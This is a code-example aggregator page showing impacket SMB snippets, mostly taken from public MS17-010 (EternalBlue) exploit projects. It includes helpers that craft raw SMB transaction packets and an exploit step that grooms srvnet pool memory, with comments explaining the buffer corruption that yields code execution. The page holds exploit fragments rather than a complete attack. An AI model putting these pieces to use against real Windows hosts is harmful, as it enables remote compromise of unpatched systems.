Python impacket.smb.SMB Examples
The following are 30
code examples of impacket.smb.SMB().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
impacket.smb
, or try the search function
.
.
Example #1
| Source File: smbconnection.py From cracke-dit with MIT License | 6 votes |
|
def reconnect(self):
"""
reconnects the SMB object based on the original options and credentials used. Only exception is that
manualNegotiate will not be honored.
Not only the connection will be created but also a login attempt using the original credentials and
method (Kerberos, PtH, etc)
:return: True, raises a SessionError exception if error
"""
userName, password, domain, lmhash, nthash, aesKey, TGT, TGS = self.getCredentials()
self.negotiateSession(self._preferredDialect)
if self._doKerberos is True:
self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey, self._kdcHost, TGT, TGS, self._useCache)
else:
self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)
return True
Example #2
| Source File: smbconnection.py From CVE-2017-7494 with GNU General Public License v3.0 | 6 votes |
|
def reconnect(self):
"""
reconnects the SMB object based on the original options and credentials used. Only exception is that
manualNegotiate will not be honored.
Not only the connection will be created but also a login attempt using the original credentials and
method (Kerberos, PtH, etc)
:return: True, raises a SessionError exception if error
"""
userName, password, domain, lmhash, nthash, aesKey, TGT, TGS = self.getCredentials()
self.negotiateSession(self._preferredDialect)
if self._doKerberos is True:
self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey, self._kdcHost, TGT, TGS, self._useCache)
else:
self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)
return True
Example #3
| Source File: mysmb.py From MS17-010-Python with MIT License | 6 votes |
|
def create_trans_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION) transCmd['Parameters'] = smb.SMBTransaction_Parameters() transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['MaxSetupCount'] = maxSetupCount transCmd['Parameters']['Flags'] = 0 transCmd['Parameters']['Timeout'] = 0xffffffff transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #4
| Source File: mysmb.py From MS17-010-Python with MIT License | 6 votes |
|
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2) transCmd['Parameters'] = smb.SMBTransaction2_Parameters() transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['MaxSetupCount'] = len(setup) transCmd['Parameters']['Flags'] = 0 transCmd['Parameters']['Timeout'] = 0xffffffff transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #5
| Source File: mysmb.py From MS17-010-Python with MIT License | 6 votes |
|
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) transCmd['Parameters'] = smb.SMBNTTransaction_Parameters() transCmd['Parameters']['MaxSetupCount'] = maxSetupCount transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Function'] = function transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #6
| Source File: 42315.py From exploitdb-bin-sploits with GNU General Public License v2.0 | 6 votes |
|
def _put_trans_data(transCmd, parameters, data, noPad=False):
# have to init offset before calling len()
transCmd['Parameters']['ParameterOffset'] = 0
transCmd['Parameters']['DataOffset'] = 0
# SMB header: 32 bytes
# WordCount: 1 bytes
# ByteCount: 2 bytes
# Note: Setup length is included when len(param) is called
offset = 32 + 1 + len(transCmd['Parameters']) + 2
transData = ''
if len(parameters):
padLen = 0 if noPad else (4 - offset % 4 ) % 4
transCmd['Parameters']['ParameterOffset'] = offset + padLen
transData = ('\x00' * padLen) + parameters
offset += padLen + len(parameters)
if len(data):
padLen = 0 if noPad else (4 - offset % 4 ) % 4
transCmd['Parameters']['DataOffset'] = offset + padLen
transData += ('\x00' * padLen) + data
transCmd['Data'] = transData
Example #7
| Source File: mysmb.py From MS17-010-Python with MIT License | 6 votes |
|
def _put_trans_data(transCmd, parameters, data, noPad=False):
# have to init offset before calling len()
transCmd['Parameters']['ParameterOffset'] = 0
transCmd['Parameters']['DataOffset'] = 0
# SMB header: 32 bytes
# WordCount: 1 bytes
# ByteCount: 2 bytes
# Note: Setup length is included when len(param) is called
offset = 32 + 1 + len(transCmd['Parameters']) + 2
transData = ''
if len(parameters):
padLen = 0 if noPad else (4 - offset % 4 ) % 4
transCmd['Parameters']['ParameterOffset'] = offset + padLen
transData = ('\x00' * padLen) + parameters
offset += padLen + len(parameters)
if len(data):
padLen = 0 if noPad else (4 - offset % 4 ) % 4
transCmd['Parameters']['DataOffset'] = offset + padLen
transData += ('\x00' * padLen) + data
transCmd['Data'] = transData
Example #8
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) transCmd['Parameters'] = smb.SMBNTTransaction_Parameters() transCmd['Parameters']['MaxSetupCount'] = maxSetupCount transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Function'] = function transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #9
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2) transCmd['Parameters'] = smb.SMBTransaction2_Parameters() transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['MaxSetupCount'] = len(setup) transCmd['Parameters']['Flags'] = 0 transCmd['Parameters']['Timeout'] = 0xffffffff transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #10
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def create_smb_packet(self, smbReq, mid=None, pid=None, tid=None):
if mid is None:
mid = self.next_mid()
pkt = smb.NewSMBPacket()
pkt.addCommand(smbReq)
pkt['Tid'] = self._default_tid if tid is None else tid
pkt['Uid'] = self._uid
pkt['Pid'] = self._pid if pid is None else pid
pkt['Mid'] = mid
flags1, flags2 = self.get_flags()
pkt['Flags1'] = flags1
pkt['Flags2'] = self._pkt_flags2 if self._pkt_flags2 != 0 else flags2
if self._SignatureEnabled:
pkt['Flags2'] |= smb.SMB.FLAGS2_SMB_SECURITY_SIGNATURE
self.signSMB(pkt, self._SigningSessionKey, self._SigningChallengeResponse)
req = str(pkt)
return '\x00'*2 + pack('>H', len(req)) + req # assume length is <65536
Example #11
| Source File: 42315.py From exploitdb-bin-sploits with GNU General Public License v2.0 | 6 votes |
|
def create_trans_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION) transCmd['Parameters'] = smb.SMBTransaction_Parameters() transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['MaxSetupCount'] = maxSetupCount transCmd['Parameters']['Flags'] = 0 transCmd['Parameters']['Timeout'] = 0xffffffff transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #12
| Source File: 42315.py From exploitdb-bin-sploits with GNU General Public License v2.0 | 6 votes |
|
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2) transCmd['Parameters'] = smb.SMBTransaction2_Parameters() transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['MaxSetupCount'] = len(setup) transCmd['Parameters']['Flags'] = 0 transCmd['Parameters']['Timeout'] = 0xffffffff transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #13
| Source File: 42315.py From exploitdb-bin-sploits with GNU General Public License v2.0 | 6 votes |
|
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False): if maxSetupCount is None: maxSetupCount = len(setup) if totalParameterCount is None: totalParameterCount = len(param) if totalDataCount is None: totalDataCount = len(data) if maxParameterCount is None: maxParameterCount = totalParameterCount if maxDataCount is None: maxDataCount = totalDataCount transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) transCmd['Parameters'] = smb.SMBNTTransaction_Parameters() transCmd['Parameters']['MaxSetupCount'] = maxSetupCount transCmd['Parameters']['TotalParameterCount'] = totalParameterCount transCmd['Parameters']['TotalDataCount'] = totalDataCount transCmd['Parameters']['MaxParameterCount'] = maxParameterCount transCmd['Parameters']['MaxDataCount'] = maxDataCount transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['Function'] = function transCmd['Parameters']['Setup'] = setup _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #14
| Source File: eternalblue_exploit7.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def createConnectionWithBigSMBFirst80(target):
# https://msdn.microsoft.com/en-us/library/cc246496.aspx
# Above link is about SMB2, but the important here is first 4 bytes.
# If using wireshark, you will see the StreamProtocolLength is NBSS length.
# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.
#
# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.
# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.
# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.
sk = socket.create_connection((target, 445))
# For this exploit, use size is 0x11000
pkt = '\x00' + '\x00' + pack('>H', 0xfff7)
# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.
# Also this is invalid SMB2 message.
# I believe NSA exploit use SMB2 for hiding alert from IDS
#pkt += '\xfeSMB' # smb2
# it can be anything even it is invalid
pkt += 'BAAD' # can be any
pkt += '\x00'*0x7c
sk.send(pkt)
return sk
Example #15
| Source File: eternalblue_exploit8.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def sendEcho(conn, tid, data):
pkt = smb.NewSMBPacket()
pkt['Tid'] = tid
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
transCommand['Parameters'] = smb.SMBEcho_Parameters()
transCommand['Data'] = smb.SMBEcho_Data()
transCommand['Parameters']['EchoCount'] = 1
transCommand['Data']['Data'] = data
pkt.addCommand(transCommand)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
print('got good ECHO response')
else:
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
# override SMB.neg_session() to allow forcing ntlm authentication
Example #16
| Source File: eternalblue_exploit7.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def sendEcho(conn, tid, data):
pkt = smb.NewSMBPacket()
pkt['Tid'] = tid
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
transCommand['Parameters'] = smb.SMBEcho_Parameters()
transCommand['Data'] = smb.SMBEcho_Data()
transCommand['Parameters']['EchoCount'] = 1
transCommand['Data']['Data'] = data
pkt.addCommand(transCommand)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
print('got good ECHO response')
else:
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
Example #17
| Source File: eternalblue_exploit10.py From AutoBlue-MS17-010 with MIT License | 6 votes |
|
def sendEcho(conn, tid, data):
pkt = smb.NewSMBPacket()
pkt['Tid'] = tid
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
transCommand['Parameters'] = smb.SMBEcho_Parameters()
transCommand['Data'] = smb.SMBEcho_Data()
transCommand['Parameters']['EchoCount'] = 1
transCommand['Data']['Data'] = data
pkt.addCommand(transCommand)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
print('got good ECHO response')
else:
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
# override SMB.neg_session() to allow forcing ntlm authentication
Example #18
| Source File: mysmb.py From MS17-010-Python with MIT License | 5 votes |
|
def connect_tree(self, path, password=None, service=smb.SERVICE_ANY, smb_packet=None): self._last_tid = smb.SMB.tree_connect_andx(self, path, password, service, smb_packet) return self._last_tid
Example #19
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def login_standard(self, user, password, domain='', lmhash='', nthash='', maxBufferSize=None): _setup_login_packet_hook(maxBufferSize) smb.SMB.login_standard(self, user, password, domain, lmhash, nthash)
Example #20
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None): _setup_login_packet_hook(maxBufferSize) smb.SMB.login(self, user, password, domain, lmhash, nthash)
Example #21
| Source File: mysmb.py From MS17-010-Python with MIT License | 5 votes |
|
def do_write_andx_raw_pipe(self, fid, data, mid=None, pid=None, tid=None): writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX) writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters_Short() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['Offset'] = 0 writeAndX['Parameters']['WriteMode'] = 4 # SMB_WMODE_WRITE_RAW_NAMED_PIPE writeAndX['Parameters']['Remaining'] = 12345 # can be any. raw named pipe does not use it writeAndX['Parameters']['DataLength'] = len(data) writeAndX['Parameters']['DataOffset'] = 32 + len(writeAndX['Parameters']) + 1 + 2 + 1 # WordCount(1), ByteCount(2), Padding(1) writeAndX['Data'] = '\x00' + data # pad 1 byte self.send_raw(self.create_smb_packet(writeAndX, mid, pid, tid)) return self.recvSMB()
Example #22
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def neg_session(self, extended_security=True, negPacket=None): smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket) # to use any login method, SMB must not be used from multiple thread
Example #23
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def get_dce_rpc(self, named_pipe): smbConn = self.get_smbconnection() rpctransport = transport.SMBTransport(self.get_remote_host(), self.get_remote_host(), filename='\\'+named_pipe, smb_connection=smbConn) return rpctransport.get_dce_rpc() # override SMB.neg_session() to allow forcing ntlm authentication
Example #24
| Source File: mysmb.py From MS17-010-Python with MIT License | 5 votes |
|
def create_trans_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False): transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION_SECONDARY) transCmd['Parameters'] = SMBTransactionSecondary_Parameters() transCmd['Parameters']['TotalParameterCount'] = len(param) transCmd['Parameters']['TotalDataCount'] = len(data) transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['ParameterDisplacement'] = paramDisplacement transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['DataDisplacement'] = dataDisplacement _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #25
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def __init__(self, remote_host, use_ntlmv2=True, timeout=8): self.__use_ntlmv2 = use_ntlmv2 self._default_tid = 0 self._pid = os.getpid() & 0xffff self._last_mid = random.randint(1000, 20000) if 0x4000 <= self._last_mid <= 0x4110: self._last_mid += 0x120 self._pkt_flags2 = 0 self._last_tid = 0 # last tid from connect_tree() self._last_fid = 0 # last fid from nt_create_andx() self._smbConn = None smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
Example #26
| Source File: mysmb.py From MS17-010-Python with MIT License | 5 votes |
|
def create_trans2_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False): transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) transCmd['Parameters'] = SMBTransaction2Secondary_Parameters() transCmd['Parameters']['TotalParameterCount'] = len(param) transCmd['Parameters']['TotalDataCount'] = len(data) transCmd['Parameters']['ParameterCount'] = len(param) transCmd['Parameters']['ParameterDisplacement'] = paramDisplacement transCmd['Parameters']['DataCount'] = len(data) transCmd['Parameters']['DataDisplacement'] = dataDisplacement _put_trans_data(transCmd, param, data, noPad) return self.create_smb_packet(transCmd, mid, pid, tid)
Example #27
| Source File: eternalblue_exploit7.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def send_trans2_second(conn, tid, data, displacement): pkt = smb.NewSMBPacket() pkt['Tid'] = tid # assume no params transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed() transCommand['Data'] = smb.SMBTransaction2Secondary_Data() transCommand['Parameters']['TotalParameterCount'] = 0 transCommand['Parameters']['TotalDataCount'] = len(data) fixedOffset = 32+3+18 transCommand['Data']['Pad1'] = '' transCommand['Parameters']['ParameterCount'] = 0 transCommand['Parameters']['ParameterOffset'] = 0 if len(data) > 0: pad2Len = (4 - fixedOffset % 4) % 4 transCommand['Data']['Pad2'] = '\xFF' * pad2Len else: transCommand['Data']['Pad2'] = '' pad2Len = 0 transCommand['Parameters']['DataCount'] = len(data) transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len transCommand['Parameters']['DataDisplacement'] = displacement transCommand['Data']['Trans_Parameters'] = '' transCommand['Data']['Trans_Data'] = data pkt.addCommand(transCommand) conn.sendSMB(pkt)
Example #28
| Source File: eternalblue_exploit10.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def send_trans2_second(conn, tid, data, displacement): pkt = smb.NewSMBPacket() pkt['Tid'] = tid # assume no params transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed() transCommand['Data'] = smb.SMBTransaction2Secondary_Data() transCommand['Parameters']['TotalParameterCount'] = 0 transCommand['Parameters']['TotalDataCount'] = len(data) fixedOffset = 32+3+18 transCommand['Data']['Pad1'] = '' transCommand['Parameters']['ParameterCount'] = 0 transCommand['Parameters']['ParameterOffset'] = 0 if len(data) > 0: pad2Len = (4 - fixedOffset % 4) % 4 transCommand['Data']['Pad2'] = '\xFF' * pad2Len else: transCommand['Data']['Pad2'] = '' pad2Len = 0 transCommand['Parameters']['DataCount'] = len(data) transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len transCommand['Parameters']['DataDisplacement'] = displacement transCommand['Data']['Trans_Parameters'] = '' transCommand['Data']['Trans_Data'] = data pkt.addCommand(transCommand) conn.sendSMB(pkt)
Example #29
| Source File: ridrelay.py From ridrelay with GNU General Public License v3.0 | 5 votes |
|
def __init__(self, config, SMBClient, username):
Thread.__init__(self)
self.daemon = True
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
self.config = config
Example #30
| Source File: mysmb.py From AutoBlue-MS17-010 with MIT License | 5 votes |
|
def nt_create_andx(self, tid, filename, smb_packet=None, cmd=None, shareAccessMode=smb.FILE_SHARE_READ|smb.FILE_SHARE_WRITE, disposition=smb.FILE_OPEN, accessMask=0x2019f): self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask) return self._last_fid
